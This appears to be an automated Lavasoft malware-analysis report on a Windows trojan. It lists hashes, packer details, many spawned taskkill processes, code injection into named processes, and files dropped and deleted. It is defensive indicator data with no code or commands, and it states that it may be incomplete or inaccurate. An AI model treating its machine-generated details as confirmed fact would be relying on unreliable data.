Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 870adaabb0d08155f2e2f0d0d5111c82
SHA1: 2bb70c58118b0f1e15c88f17985192c0b5d07dcc
SHA256: c0b0e10e0dd4b8a419192ddc8e866e34758a0d3f695c9bb1be76e21ba8103d6d
SSDeep: 24576:gRpVgU6qc00PhieAdO7gejjdYKmui3BmK:0VgUo00PQlMHdYvt
Size: 816065 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:52
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
WMIC.exe:568
vchk.exe:1656
taskkill.exe:216
taskkill.exe:1140
taskkill.exe:668
taskkill.exe:136
taskkill.exe:492
taskkill.exe:1832
taskkill.exe:1836
taskkill.exe:1772
taskkill.exe:1548
taskkill.exe:1372
taskkill.exe:936
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:628
taskkill.exe:1092
taskkill.exe:1492
taskkill.exe:1956
taskkill.exe:1952
taskkill.exe:828
taskkill.exe:1668
taskkill.exe:820
taskkill.exe:376
taskkill.exe:596
taskkill.exe:1124
taskkill.exe:316
taskkill.exe:1088
taskkill.exe:1928
taskkill.exe:1852
taskkill.exe:1856
taskkill.exe:1252
taskkill.exe:1016
taskkill.exe:916
taskkill.exe:1656
taskkill.exe:308
taskkill.exe:448
taskkill.exe:1232
taskkill.exe:440
taskkill.exe:1136
taskkill.exe:1932
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:648
taskkill.exe:1632
taskkill.exe:516
taskkill.exe:1348
taskkill.exe:1340
taskkill.exe:336
taskkill.exe:576
taskkill.exe:856
taskkill.exe:1424
taskkill.exe:1980
taskkill.exe:1584
taskkill.exe:652
taskkill.exe:508
taskkill.exe:480
taskkill.exe:568
taskkill.exe:468
taskkill.exe:464
taskkill.exe:564
taskkill.exe:1804
taskkill.exe:168
taskkill.exe:228
taskkill.exe:1868
taskkill.exe:224
taskkill.exe:1916
taskkill.exe:968
taskkill.exe:1180
taskkill.exe:1456
taskkill.exe:1748
taskkill.exe:1740
taskkill.exe:740
taskkill.exe:1160
taskkill.exe:884
taskkill.exe:1204
taskkill.exe:608
taskkill.exe:552
taskkill.exe:1968
taskkill.exe:872
taskkill.exe:956
taskkill.exe:320
taskkill.exe:1112
taskkill.exe:324
taskkill.exe:1752
taskkill.exe:612
taskkill.exe:1888
taskkill.exe:1884
taskkill.exe:1760
taskkill.exe:1880
taskkill.exe:1284
taskkill.exe:512
taskkill.exe:1472
taskkill.exe:808
taskkill.exe:2008
taskkill.exe:1368
%original file name%.exe:1756
The Trojan injects its code into the following process(es):
winonit.exe:1360
getcap.exe:500
wincheckfe.exe:1768
wcheckf.exe:484
vchk.exe:1976
internetport3.exe:360
DYK287G2Jhwy64P0Ln0s.exe:1012
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process winonit.exe:1360 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\avv.txt (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
C:\a\ahho.txt (4 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh9.tmp (0 bytes)
C:\a\hho.txt (0 bytes)
The process getcap.exe:500 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiC.tmp (0 bytes)
The process WMIC.exe:568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)
The Trojan deletes the following file(s):
C:\a\ProcessList.txt (0 bytes)
The process wincheckfe.exe:1768 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)
The process wcheckf.exe:484 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsg7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (0 bytes)
The process vchk.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
C:\a\avchk.txt (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (0 bytes)
